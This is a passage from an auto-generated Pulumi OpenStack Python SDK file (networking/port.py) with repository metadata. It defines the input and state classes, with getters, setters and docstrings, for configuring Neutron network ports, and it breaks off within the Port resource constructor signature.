sdk/python/pulumi_openstack/networking/port.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/networking/port.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/networking/port.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PortArgs', 'Port']
@pulumi.input_type
class PortArgs:
def __init__(__self__, *,
network_id: pulumi.Input[str],
admin_state_up: Optional[pulumi.Input[bool]] = None,
allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]] = None,
binding: Optional[pulumi.Input['PortBindingArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
device_id: Optional[pulumi.Input[str]] = None,
device_owner: Optional[pulumi.Input[str]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]] = None,
fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
no_fixed_ip: Optional[pulumi.Input[bool]] = None,
no_security_groups: Optional[pulumi.Input[bool]] = None,
port_security_enabled: Optional[pulumi.Input[bool]] = None,
qos_policy_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
The set of arguments for constructing a Port resource.
:param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
this creates a new port.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
:param pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]] allowed_address_pairs: An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
:param pulumi.Input['PortBindingArgs'] binding: The port binding allows to specify binding information
for the port. The structure is described below.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing port.
:param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
creates a new port.
:param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
a new port.
:param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
is enabled.
:param pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]] extra_dhcp_options: An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
:param pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]] fixed_ips: An array of desired IPs for
this port. The structure is described below.
:param pulumi.Input[str] mac_address: The additional MAC address.
:param pulumi.Input[str] name: Name of the DHCP option.
:param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
:param pulumi.Input[bool] no_security_groups: If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
:param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
:param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
:param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
:param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
"""
pulumi.set(__self__, "network_id", network_id)
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if allowed_address_pairs is not None:
pulumi.set(__self__, "allowed_address_pairs", allowed_address_pairs)
if binding is not None:
pulumi.set(__self__, "binding", binding)
if description is not None:
pulumi.set(__self__, "description", description)
if device_id is not None:
pulumi.set(__self__, "device_id", device_id)
if device_owner is not None:
pulumi.set(__self__, "device_owner", device_owner)
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if extra_dhcp_options is not None:
pulumi.set(__self__, "extra_dhcp_options", extra_dhcp_options)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if name is not None:
pulumi.set(__self__, "name", name)
if no_fixed_ip is not None:
pulumi.set(__self__, "no_fixed_ip", no_fixed_ip)
if no_security_groups is not None:
pulumi.set(__self__, "no_security_groups", no_security_groups)
if port_security_enabled is not None:
pulumi.set(__self__, "port_security_enabled", port_security_enabled)
if qos_policy_id is not None:
pulumi.set(__self__, "qos_policy_id", qos_policy_id)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Input[str]:
"""
The ID of the network to attach the port to. Changing
this creates a new port.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: pulumi.Input[str]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="allowedAddressPairs")
def allowed_address_pairs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]:
"""
An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
"""
return pulumi.get(self, "allowed_address_pairs")
@allowed_address_pairs.setter
def allowed_address_pairs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]):
pulumi.set(self, "allowed_address_pairs", value)
@property
@pulumi.getter
def binding(self) -> Optional[pulumi.Input['PortBindingArgs']]:
"""
The port binding allows to specify binding information
for the port. The structure is described below.
"""
return pulumi.get(self, "binding")
@binding.setter
def binding(self, value: Optional[pulumi.Input['PortBindingArgs']]):
pulumi.set(self, "binding", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing port.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="deviceId")
def device_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the device attached to the port. Changing this
creates a new port.
"""
return pulumi.get(self, "device_id")
@device_id.setter
def device_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_id", value)
@property
@pulumi.getter(name="deviceOwner")
def device_owner(self) -> Optional[pulumi.Input[str]]:
"""
The device owner of the port. Changing this creates
a new port.
"""
return pulumi.get(self, "device_owner")
@device_owner.setter
def device_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_owner", value)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
The port DNS name. Available, when Neutron DNS extension
is enabled.
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="extraDhcpOptions")
def extra_dhcp_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]:
"""
An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
"""
return pulumi.get(self, "extra_dhcp_options")
@extra_dhcp_options.setter
def extra_dhcp_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]):
pulumi.set(self, "extra_dhcp_options", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]:
"""
An array of desired IPs for
this port. The structure is described below.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[pulumi.Input[str]]:
"""
The additional MAC address.
"""
return pulumi.get(self, "mac_address")
@mac_address.setter
def mac_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mac_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the DHCP option.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="noFixedIp")
def no_fixed_ip(self) -> Optional[pulumi.Input[bool]]:
"""
Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
"""
return pulumi.get(self, "no_fixed_ip")
@no_fixed_ip.setter
def no_fixed_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_fixed_ip", value)
@property
@pulumi.getter(name="noSecurityGroups")
def no_security_groups(self) -> Optional[pulumi.Input[bool]]:
"""
If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
"""
return pulumi.get(self, "no_security_groups")
@no_security_groups.setter
def no_security_groups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_security_groups", value)
@property
@pulumi.getter(name="portSecurityEnabled")
def port_security_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
"""
return pulumi.get(self, "port_security_enabled")
@port_security_enabled.setter
def port_security_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "port_security_enabled", value)
@property
@pulumi.getter(name="qosPolicyId")
def qos_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Reference to the associated QoS policy.
"""
return pulumi.get(self, "qos_policy_id")
@qos_policy_id.setter
def qos_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "qos_policy_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the port.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Map of additional options.
"""
return pulumi.get(self, "value_specs")
@value_specs.setter
def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "value_specs", value)
@pulumi.input_type
class _PortState:
def __init__(__self__, *,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
all_security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]] = None,
binding: Optional[pulumi.Input['PortBindingArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
device_id: Optional[pulumi.Input[str]] = None,
device_owner: Optional[pulumi.Input[str]] = None,
dns_assignments: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]] = None,
fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_fixed_ip: Optional[pulumi.Input[bool]] = None,
no_security_groups: Optional[pulumi.Input[bool]] = None,
port_security_enabled: Optional[pulumi.Input[bool]] = None,
qos_policy_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Input properties used for looking up and filtering Port resources.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_fixed_ips: The collection of Fixed IP addresses on the port in the
order returned by the Network v2 API.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_security_group_ids: The collection of Security Group IDs on the port
which have been explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the port, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]] allowed_address_pairs: An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
:param pulumi.Input['PortBindingArgs'] binding: The port binding allows to specify binding information
for the port. The structure is described below.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing port.
:param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
creates a new port.
:param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
a new port.
:param pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]] dns_assignments: The list of maps representing port DNS assignments.
:param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
is enabled.
:param pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]] extra_dhcp_options: An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
:param pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]] fixed_ips: An array of desired IPs for
this port. The structure is described below.
:param pulumi.Input[str] mac_address: The additional MAC address.
:param pulumi.Input[str] name: Name of the DHCP option.
:param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
this creates a new port.
:param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
:param pulumi.Input[bool] no_security_groups: If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
:param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
:param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
:param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
:param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
"""
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if all_fixed_ips is not None:
pulumi.set(__self__, "all_fixed_ips", all_fixed_ips)
if all_security_group_ids is not None:
pulumi.set(__self__, "all_security_group_ids", all_security_group_ids)
if all_tags is not None:
pulumi.set(__self__, "all_tags", all_tags)
if allowed_address_pairs is not None:
pulumi.set(__self__, "allowed_address_pairs", allowed_address_pairs)
if binding is not None:
pulumi.set(__self__, "binding", binding)
if description is not None:
pulumi.set(__self__, "description", description)
if device_id is not None:
pulumi.set(__self__, "device_id", device_id)
if device_owner is not None:
pulumi.set(__self__, "device_owner", device_owner)
if dns_assignments is not None:
pulumi.set(__self__, "dns_assignments", dns_assignments)
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if extra_dhcp_options is not None:
pulumi.set(__self__, "extra_dhcp_options", extra_dhcp_options)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if name is not None:
pulumi.set(__self__, "name", name)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if no_fixed_ip is not None:
pulumi.set(__self__, "no_fixed_ip", no_fixed_ip)
if no_security_groups is not None:
pulumi.set(__self__, "no_security_groups", no_security_groups)
if port_security_enabled is not None:
pulumi.set(__self__, "port_security_enabled", port_security_enabled)
if qos_policy_id is not None:
pulumi.set(__self__, "qos_policy_id", qos_policy_id)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="allFixedIps")
def all_fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of Fixed IP addresses on the port in the
order returned by the Network v2 API.
"""
return pulumi.get(self, "all_fixed_ips")
@all_fixed_ips.setter
def all_fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_fixed_ips", value)
@property
@pulumi.getter(name="allSecurityGroupIds")
def all_security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of Security Group IDs on the port
which have been explicitly and implicitly added.
"""
return pulumi.get(self, "all_security_group_ids")
@all_security_group_ids.setter
def all_security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_security_group_ids", value)
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of tags assigned on the port, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@all_tags.setter
def all_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_tags", value)
@property
@pulumi.getter(name="allowedAddressPairs")
def allowed_address_pairs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]:
"""
An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
"""
return pulumi.get(self, "allowed_address_pairs")
@allowed_address_pairs.setter
def allowed_address_pairs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]):
pulumi.set(self, "allowed_address_pairs", value)
@property
@pulumi.getter
def binding(self) -> Optional[pulumi.Input['PortBindingArgs']]:
"""
The port binding allows to specify binding information
for the port. The structure is described below.
"""
return pulumi.get(self, "binding")
@binding.setter
def binding(self, value: Optional[pulumi.Input['PortBindingArgs']]):
pulumi.set(self, "binding", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing port.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="deviceId")
def device_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the device attached to the port. Changing this
creates a new port.
"""
return pulumi.get(self, "device_id")
@device_id.setter
def device_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_id", value)
@property
@pulumi.getter(name="deviceOwner")
def device_owner(self) -> Optional[pulumi.Input[str]]:
"""
The device owner of the port. Changing this creates
a new port.
"""
return pulumi.get(self, "device_owner")
@device_owner.setter
def device_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_owner", value)
@property
@pulumi.getter(name="dnsAssignments")
def dns_assignments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]]:
"""
The list of maps representing port DNS assignments.
"""
return pulumi.get(self, "dns_assignments")
@dns_assignments.setter
def dns_assignments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]]):
pulumi.set(self, "dns_assignments", value)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
The port DNS name. Available, when Neutron DNS extension
is enabled.
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="extraDhcpOptions")
def extra_dhcp_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]:
"""
An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
"""
return pulumi.get(self, "extra_dhcp_options")
@extra_dhcp_options.setter
def extra_dhcp_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]):
pulumi.set(self, "extra_dhcp_options", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]:
"""
An array of desired IPs for
this port. The structure is described below.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[pulumi.Input[str]]:
"""
The additional MAC address.
"""
return pulumi.get(self, "mac_address")
@mac_address.setter
def mac_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mac_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the DHCP option.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the network to attach the port to. Changing
this creates a new port.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="noFixedIp")
def no_fixed_ip(self) -> Optional[pulumi.Input[bool]]:
"""
Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
"""
return pulumi.get(self, "no_fixed_ip")
@no_fixed_ip.setter
def no_fixed_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_fixed_ip", value)
@property
@pulumi.getter(name="noSecurityGroups")
def no_security_groups(self) -> Optional[pulumi.Input[bool]]:
"""
If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
"""
return pulumi.get(self, "no_security_groups")
@no_security_groups.setter
def no_security_groups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_security_groups", value)
@property
@pulumi.getter(name="portSecurityEnabled")
def port_security_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
"""
return pulumi.get(self, "port_security_enabled")
@port_security_enabled.setter
def port_security_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "port_security_enabled", value)
@property
@pulumi.getter(name="qosPolicyId")
def qos_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Reference to the associated QoS policy.
"""
return pulumi.get(self, "qos_policy_id")
@qos_policy_id.setter
def qos_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "qos_policy_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the port.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Map of additional options.
"""
return pulumi.get(self, "value_specs")
@value_specs.setter
def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "value_specs", value)
class Port(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]]] = None,
binding: Optional[pulumi.Input[pulumi.InputType['PortBindingArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
device_id: Optional[pulumi.Input[str]] = None,
device_owner: Optional[pulumi.Input[str]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]]] = None,
